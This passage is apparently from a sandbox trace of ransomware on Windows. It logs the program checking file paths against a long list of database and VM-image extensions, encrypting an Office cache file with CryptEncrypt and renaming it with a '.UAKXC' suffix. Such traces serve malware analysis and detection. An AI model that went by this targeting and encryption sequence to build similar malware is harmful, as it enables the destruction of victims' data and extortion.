Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".ns4") returned 0x0 [0158.119] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".nsf") returned 0x0 [0158.119] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".nv") returned 0x0 [0158.119] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".nv2") returned 0x0 [0158.119] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".nwdb") returned 0x0 [0158.119] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".nyf") returned 0x0 [0158.119] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".odb") returned 0x0 [0158.119] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".oqy") returned 0x0 [0158.120] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".orx") returned 0x0 [0158.120] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".owc") returned 0x0 [0158.120] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".p96") returned 0x0 [0158.120] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".p97") returned 0x0 [0158.120] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".pan") returned 0x0 [0158.120] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".pdb") returned 0x0 [0158.120] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".pdm") returned 0x0 [0158.120] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".pnz") returned 0x0 [0158.120] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".qry") returned 0x0 [0158.120] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".qvd") returned 0x0 [0158.120] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".rbf") returned 0x0 [0158.120] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".rctd") returned 0x0 [0158.120] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".rod") returned 0x0 [0158.120] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".rodx") returned 0x0 [0158.120] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".rpd") returned 0x0 [0158.120] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".rsd") returned 0x0 [0158.120] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".sas7bdat") returned 0x0 [0158.121] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".sbf") returned 0x0 [0158.121] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".scx") returned 0x0 [0158.121] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".sdb") returned 0x0 [0158.122] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".sdc") returned 0x0 [0158.122] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".sdf") returned 0x0 [0158.123] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".sis") returned 0x0 [0158.123] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".spq") returned 0x0 [0158.123] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".sql") returned 0x0 [0158.123] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".sqlite") returned 0x0 [0158.123] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".sqlite3") returned 0x0 [0158.123] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".sqlitedb") returned 0x0 [0158.123] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".te") returned 0x0 [0158.123] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".temx") returned 0x0 [0158.123] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".tmd") returned 0x0 [0158.123] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".tps") returned 0x0 [0158.123] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".trc") returned 0x0 [0158.123] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".trm") returned 0x0 [0158.123] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".udb") returned 0x0 [0158.123] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".udl") returned 0x0 [0158.124] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".usr") returned 0x0 [0158.124] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".v12") returned 0x0 [0158.124] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".vis") returned 0x0 [0158.124] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".vpd") returned 0x0 [0158.124] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".vvv") returned 0x0 [0158.124] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".wdb") returned 0x0 [0158.124] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".wmdb") returned 0x0 [0158.124] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".wrk") returned 0x0 [0158.124] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".xdb") returned 0x0 [0158.124] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".xld") returned 0x0 [0158.124] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".xmlff") returned 0x0 [0158.124] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".abcddb") returned 0x0 [0158.124] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".abs") returned 0x0 [0158.124] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".abx") returned 0x0 [0158.124] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".accdw") returned 0x0 [0158.124] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".adn") returned 0x0 [0158.124] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".db2") returned 0x0 [0158.124] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".fm5") returned 0x0 [0158.124] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".hjt") returned 0x0 [0158.125] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".icg") returned 0x0 [0158.125] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".icr") returned 0x0 [0158.125] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".kdb") returned 0x0 [0158.125] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".lut") returned 0x0 [0158.125] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".maw") returned 0x0 [0158.125] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".mdn") returned 0x0 [0158.125] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".mdt") returned 0x0 [0158.125] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".vdi") returned 0x0 [0158.125] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".vhd") returned 0x0 [0158.125] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".vmdk") returned 0x0 [0158.125] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".pvm") returned 0x0 [0158.125] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".vmem") returned 0x0 [0158.125] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".vmsn") returned 0x0 [0158.125] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".vmsd") returned 0x0 [0158.125] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".nvram") returned 0x0 [0158.125] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".vmx") returned 0x0 [0158.125] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".raw") returned 0x0 [0158.125] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".qcow2") returned 0x0 [0158.126] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".subvol") returned 0x0 [0158.126] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".bin") returned 0x0 [0158.126] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".vsv") returned 0x0 [0158.126] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".avhd") returned 0x0 [0158.126] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".vmrs") returned 0x0 [0158.126] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".vhdx") returned 0x0 [0158.126] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".avdx") returned 0x0 [0158.126] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".vmcx") returned 0x0 [0158.126] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpSrch=".iso") returned 0x0 [0158.126] SetFilePointerEx (in: hFile=0x6ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.126] WriteFile (in: hFile=0x6ec, lpBuffer=0x373fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x373fc78, lpOverlapped=0x0 | out: lpBuffer=0x373fd70*, lpNumberOfBytesWritten=0x373fc78*=0x20c, lpOverlapped=0x0) returned 1 [0158.129] WriteFile (in: hFile=0x6ec, lpBuffer=0x373fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x373fc7c, lpOverlapped=0x0 | out: lpBuffer=0x373fc80*, lpNumberOfBytesWritten=0x373fc7c*=0xa, lpOverlapped=0x0) returned 1 [0158.129] SetEndOfFile (hFile=0x6ec) returned 1 [0158.129] SetFilePointerEx (in: hFile=0x6ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.129] ReadFile (in: hFile=0x6ec, lpBuffer=0x4100000, nNumberOfBytesToRead=0x567, lpNumberOfBytesRead=0x373fc88, lpOverlapped=0x0 | out: lpBuffer=0x4100000*, lpNumberOfBytesRead=0x373fc88*=0x567, lpOverlapped=0x0) returned 1 [0158.129] SetFilePointerEx (in: hFile=0x6ec, liDistanceToMove=0xfffffa99, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0158.129] WriteFile (in: hFile=0x6ec, lpBuffer=0x4100000*, nNumberOfBytesToWrite=0x567, lpNumberOfBytesWritten=0x373fc44, lpOverlapped=0x0 | out: lpBuffer=0x4100000*, lpNumberOfBytesWritten=0x373fc44*=0x567, lpOverlapped=0x0) returned 1 [0158.129] CloseHandle (hObject=0x6ec) returned 1 [0158.131] GetProcessHeap () returned 0xea0000 [0158.131] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0x77920d0 [0158.131] lstrcpyW (in: lpString1=0x77920d0, lpString2="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" [0158.131] lstrcatW (in: lpString1="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpString2=".UAKXC" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.UAKXC") returned="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.UAKXC" [0158.131] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.UAKXC" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml.uakxc")) returned 1 [0158.132] GetProcessHeap () returned 0xea0000 [0158.132] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77920d0 | out: hHeap=0xea0000) returned 1 [0158.132] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef5ea8 | out: hHeap=0xea0000) returned 1 [0158.132] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6c90 | out: hHeap=0xea0000) returned 1 [0158.133] CryptGenRandom (in: hProv=0xece568, dwLen=0x20, pbBuffer=0x373fd50 | out: pbBuffer=0x373fd50) returned 1 [0158.133] CryptGenRandom (in: hProv=0xece568, dwLen=0x8, pbBuffer=0x373fd48 | out: pbBuffer=0x373fd48) returned 1 [0158.133] CryptEncrypt (in: hKey=0xece4f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x200) returned 1 [0158.133] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab")) returned 0x2020 [0158.134] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6ec [0158.134] GetLastError () returned 0x0 [0158.134] GetFileSizeEx (in: hFile=0x6ec, lpFileSize=0x373fc88 | out: lpFileSize=0x373fc88*=2928955) returned 1 [0158.134] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".4dd") returned 0x0 [0158.134] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".4dl") returned 0x0 [0158.134] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".accdb") returned 0x0 [0158.134] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".accdc") returned 0x0 [0158.134] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".accde") returned 0x0 [0158.134] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".accdr") returned 0x0 [0158.134] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".accdt") returned 0x0 [0158.134] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".accft") returned 0x0 [0158.134] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".adb") returned 0x0 [0158.134] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".ade") returned 0x0 [0158.134] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".adf") returned 0x0 [0158.134] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".adp") returned 0x0 [0158.135] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".arc") returned 0x0 [0158.135] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".ora") returned 0x0 [0158.135] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".alf") returned 0x0 [0158.135] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".ask") returned 0x0 [0158.135] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".btr") returned 0x0 [0158.135] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".bdf") returned 0x0 [0158.135] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".cat") returned 0x0 [0158.135] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".cdb") returned 0x0 [0158.135] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".ckp") returned 0x0 [0158.135] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".cma") returned 0x0 [0158.135] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".cpd") returned 0x0 [0158.135] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".dacpac") returned 0x0 [0158.135] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".dad") returned 0x0 [0158.135] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".dadiagrams") returned 0x0 [0158.135] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".daschema") returned 0x0 [0158.135] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".db") returned 0x0 [0158.135] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".db-shm") returned 0x0 [0158.135] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".db-wal") returned 0x0 [0158.135] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".db3") returned 0x0 [0158.135] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".dbc") returned 0x0 [0158.135] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".dbf") returned 0x0 [0158.135] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".dbs") returned 0x0 [0158.136] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".dbt") returned 0x0 [0158.136] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".dbv") returned 0x0 [0158.136] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".dbx") returned 0x0 [0158.136] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".dcb") returned 0x0 [0158.136] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".dct") returned 0x0 [0158.136] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".dcx") returned 0x0 [0158.136] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".ddl") returned 0x0 [0158.136] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".dlis") returned 0x0 [0158.136] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".dp1") returned 0x0 [0158.136] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".dqy") returned 0x0 [0158.136] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".dsk") returned 0x0 [0158.136] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".dsn") returned 0x0 [0158.136] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".dtsx") returned 0x0 [0158.136] StrStrIW 